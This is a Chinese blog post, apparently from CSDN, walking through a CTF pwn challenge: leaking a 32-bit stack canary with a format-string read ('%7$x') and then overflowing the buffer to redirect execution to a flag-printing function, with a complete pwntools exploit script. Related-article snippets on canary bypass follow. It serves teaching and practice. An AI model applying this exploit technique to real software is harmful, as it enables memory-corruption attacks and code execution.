CTF中的PWN——绕canary防护1(32bit 格式化字符串漏洞leak canary 栈溢出)

最新推荐文章于 2024-06-08 18:02:49 发布
最新推荐文章于 2024-06-08 18:02:49 发布
阅读量1.2k 收藏 8
点赞数 3
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39194641/article/details/101689831
版权

前言:

    金丝雀:

    canary就像哨兵一样,由程序运行时随机产生。在函数返回之前,程序检测这个值以确认栈未被破坏,达到避免攻击的目的。程序会使用fs:x来进行保护,这个地址指向了一个我们无法看到的随机值,并且fs是一个由内核维护的结构

如果金丝雀(canary)的值被修改了,栈溢出发生了,保存的指令指针可能也被修改了,因此不能安全返回,函数会调用__stack_chk_fail函数。这个函数会做些处理,然后丢出一个错误退出进程。

    基本绕过方式:由于Canary保护仅仅是检查canary是否被改写,而不会检查其他栈内容因此如果攻击者能够泄露出canary的值(一般都是利用格式化字符串漏洞),便可以在构造攻击负载时填充正确的canary,从而绕过canary检查,达到实施攻击的目的。

    注意:一个程序中的所有函数应该都有栈保护。下述例子中每个函数的canary对比的地址都是fs:14,推断所有函数返回前对比的随机值都是一个!!!

    例题:

    查看程序详细信息:

    程序有着栈保护及NX保护,将文件拖入IDA中分析:

     上图中存在格式化字符串漏洞,可以直接利用其leak金丝雀的值。

    fun函数中存在栈溢出的情况,查看程序其他函数发现 getFlag函数,那么PWN此程序的思路就是使用格式化字符串漏洞leak金丝雀的值,然后添加canary再溢出即可。调试程序并leak金丝雀过程如下:

    本文给fun函数下断点方便分析:

    运行程序:

 

    输入aaaa,继续调试,:

    发现canary的位置为ebp - 0xc ,找到canary的位置,计算格式化字符串偏移量为7:

     进入fun函数继续分析:

    canary的位置在ebp + var_C,溢出点在ebp - 70h查看fun函数栈:

 

    溢出点到fun函数内的canary距离为 0x70 - 0x0c =  100,那么payload如下:

from pwn import *

p = process('./bin')

payload = '%7$x'
p.sendline(payload)
canary = int(p.recv(),16)
 
catFlag_addr = 0x0804863B

payload = 'A' * 100 + p32(canary) + 'A' * 12 + p32(catFlag_addr)

p.sendline(payload)
p.interactive()

    运行结果如下:

    可以看到 system ('cat flag')执行。

    结语:

    第一次绕过canary,写的有点啰嗦,这种PWN的方法只是绕canary众多方法中的一种,后续继续更新。

壊壊的诱惑你
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
二进制漏洞挖掘之栈溢出-开启Canary
ylcangel的专栏
10-18 1092
二进制漏洞-栈溢出 github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32位 内核版本:Linux 2.6.32-754.10.1.e...
CTFPWN——canary防护2(64bit + 格式化字符串漏洞leak canary + 栈溢出
壊壊的诱惑你的博客
10-15 1926
前言: 前文canary防护1程序时32位的,这篇文章pwn的程序是64位的,都是利用格式化字符串漏洞leak canary的值,然后直接栈溢出即可,只是位数不同,利用格式化字符串漏洞泄露金丝雀值也略微不同。 题目:Mary_Morton-攻防世界 检查软件的详细信息: 64的金丝雀与NX,拖入IDA64查看: 当输入等于2时存在格式化字符串漏...
格式化字符串漏洞攻击/由浅入深了解格式化字符串漏洞_详细网络安全详细教程
最新发布
2401_84915584的博客
06-08 647
格式化字符串漏洞是一种威力比较大的漏洞漏洞原因主要是因为使用类似于printf(str)这类语句,里面的str用户可以自己定义。轻则使程序dump
PWN入门(10)过程序堆栈Canary防护
Ba1_Ma0的博客
10-05 1080
简介“pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入10文件夹。
[Asuri_CTFHub] pwn for(canary泄露)Write up
yym68686
01-25 975
文件 for 这一题发现两个答案,canary偏移是47或39都可以。可能的原因是因为一个程序可以有很多个canary,canary是main函数的,所以是47,如果用choice2这个函数的canary就是39。 先看第一种情况偏移为47。 发现在函数choice2()第九行printf(&s);表明存在格式化字符串漏洞。 用pwndbg确定printf地址,标记断点。 b printf 然后 run 输入 2 # 进入choice2()函数 1234 # printf的参数,随便
祥云杯2022 pwn - leak
z1r0的博客
11-08 419
wjh师傅的思路是利用botcake的方法,将unsortedbin和tcache重叠,使得unsortedbin的fd落到tcache的fd,再修改最后两字节,进行libc上地址的申请,可以申请到global_max_fast和stdout,这里由于地址随机化肯定是需要爆破的。算好size之后,delete掉,此时目标地址就会指向堆地址,从而实现了向地址写入堆地址,因为flag在堆地址里,所以就可以泄露出flag,exp就用的wjh师傅的。当时比赛没有做出来,光顾着泄露libc地址去了。
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: ... <?... if($_SESSION['username']) { ... if($_POST['username'] && $_POST['password']) { ... if(strlen($username
信息安全_CTFPWN题目实例分析.pptx
08-14
在本文,我们将深入分析 PWN 题目的常见漏洞,包括堆栈溢出漏洞格式化字符串漏洞,并对其进行详细的分析和解释。 堆栈溢出漏洞栈溢出漏洞是一种常见的漏洞类型,发生在函数调用时,函数的返回地址被覆盖...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
1. 更新 Shiro 到最新版本:Apache Shiro 通常会在发现此类漏洞后发布修复更新,因此确保使用的是最新版本是最基本的防护措施。 2. 配置序列化策略:限制允许反序列化的类,只接受可信的序列化数据,避免未经验证的...
pwn栈溢出10道练习题有writeup
01-04
4. **格式字符串漏洞**:特定函数如`printf`和`scanf`允许使用格式化字符串,如果用户输入不受限制,可以导致栈溢出。学习如何识别和利用这些漏洞pwn题目的常见部分。 5. **堆溢出**:虽然题目主要关注栈溢出,但...
ctf(pwn) canary保护机制讲解 与 解密方法介绍
半岛铁盒的博客
03-03 2159
Canary保护机制 canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 在函数开始时就随机产生一个值,将这个值CANARY放到栈上紧挨ebp的上一个位置,当攻击者想通过缓冲区溢出覆盖ebp或者ebp下方的返回地址时,一定会覆盖掉CANARY的值;当程序结束时,程序会检查CANARY这个值和之前的是否一致,如果不一致,则不会往下运行,从而避免了缓冲区溢出攻
PWN-canary学习
苗_的博客
02-10 1522
先简单介绍一下canary: Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器获取一个值,一般存到EBP - 0x4(32位)或RBP - 0x8...
ctf php fork,CTF PWN 总结
weixin_42347873的博客
03-12 278
这个很久总结的了,基本很久没打比赛了,现在发出来了—— 20190903本文分为信息泄露和漏洞利用技术,因为很多时候信息泄露都是通用,下面的这两部分会重合信息泄露程序本来就给你泄露就再好不过了利用wrtite,puts,printf等泄露利用%s这个遇到00才停止的可能可以泄露(strlen,strdup等都需要关注)格式化字符串%x或这%p泄露uaf的任意读取smallbin(unsortbin...
ctf-pwn:canary
chennbnbnb的博客
01-19 2970
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
[HNCTF 2022 WEEK4] ezcanary 复现
Xzzzz911的博客
09-22 820
显然canary就是第51个参数(这个你不会看不出来吧,评论区见),这样就可以得到canary的地址了,接下来就剩下泄露libc了,注意下面两个参数就是可以泄露的libc地址 0x7ffff7db0d90(注意不同代码的颜色),再从vmmap找到libc,然后就可以算到偏移了,最后就可以得到libc的基址了(太裤辣)接下来就是想办法溢出canary,并且泄露libc,先运行一下程序,看看偏移吧(很容易发现偏移是六),接下来就是gdb调试,看看canary位置了,把断点打在printf。
Canary学习(爆破Canary
至臻求学,胸怀云月
01-30 3770
one-by-one 爆破Canary原理 对于Canary,虽然每次进程重启后Canary不同,但是同一个进程的不同线程的Cannary是相同的,并且通过fork函数创建的子进程的canary也是相同的,因为fork函数会直接拷贝父进程的内存。 最低位为0x00,之后逐次爆破,如果canary爆破不成功,则程序崩溃;爆破成功则程序进行下面的逻辑。由此可判断爆破是否成功。 我们可以利用这样的...
CTFpwn常见保护及过:pie,canary
2302_79813730的博客
01-27 2311
这道题没有后门,我们还需要libc去做,这样我们需要泄露出一个正常的函数地址,来计算出libc_base,但是我们发现泄露的地址没有函数,libc_start_call_main(下称libc_call),这个函数我们不可以使用,因为找不到它的偏移(这里是因为虚拟机版本问题,一般libc_start_main(下称libc_main)可以被泄露出来)跟libc利用很像。之后跟进ctfshow函数,进行代码审计,第一个while循环没什么用,我们随便发送个数据就可以过,重点!
pwn 格式化字符串漏洞及例题
limenzzz的博客
10-21 1844
一些输出函数例如printf,sprintf都接受参数输入,例如printf("%d",s)。但如果在编写函数时为方便写为printf(s),则可通过对s输入的构造来执行一些操作。 在其常见的有通过-%p %08x等参数来查看偏移值,简单来说,就是输入的值存在于栈的哪个地方。
格式化字符串漏洞原理及其利用(附带pwn例题讲解)
WdIg-2023的博客
04-09 2907
格式化字符串漏洞在实际利用过程现在几乎挖掘不到了,但是在CTFpwn,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。在我们初识C语言的时候,我们经常会使用到printf这之类的函数,printf函数的第一个参数就是一个格式化字符串,就是程序员可以使用占位符,指定格式,这些占位符用来替代后面的变量或者是数据。简单总结就是说,我们可以在一个字符串,执行某个位置应该输出怎么样的数据,使用占位符代替,在输出的时候函数会自动按照我们指定的格式,寻找参数并以我们预想的形式输出。
ctf pwn read溢出
06-06
CTF(Capture the Flag)PWN(Practical Web exploitation,通常指payload writing)是指渗透测试或漏洞利用的技术挑战,特别是关于控制流劫持(Control Flow Hijacking)的子领域,如read溢出。Read溢出通常发生在程序处理用户输入时,如果没有正确验证输入长度,导致读取的数据超过了预期范围,从而覆盖了附近的内存区域,包括函数返回地址、栈帧或其他关键数据。 在PWN场景,read溢出的步骤可能包括: 1. **环境识别**:确定目标程序的架构(如x86, x64, ARM等),操作系统,以及使用的函数调用约定(如cdecl, stdcall等)。 2. **输入构造**:创建一个恶意输入,包含超出正常长度的数据,并巧妙地将要执行代码(比如shellcode或ROP gadget)的地址放在溢出区域。 3. **栈布局理解**:了解栈内存布局,包括局部变量、函数参数和返回地址的位置,这有助于确定如何覆盖返回地址并控制程序流程。 4. **执行控制**:通过溢出触发程序执行,成功修改返回地址后,程序会跳转到预设的地址,从而执行攻击者提供的代码,比如执行系统命令、获取shell等。 5. **防御措施**:注意防范其他安全机制,如非NULL终止字符串检查、ASLR(地址空间_layout_randomization)和NX(No-execute)保护等,可能需要利用技巧过。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值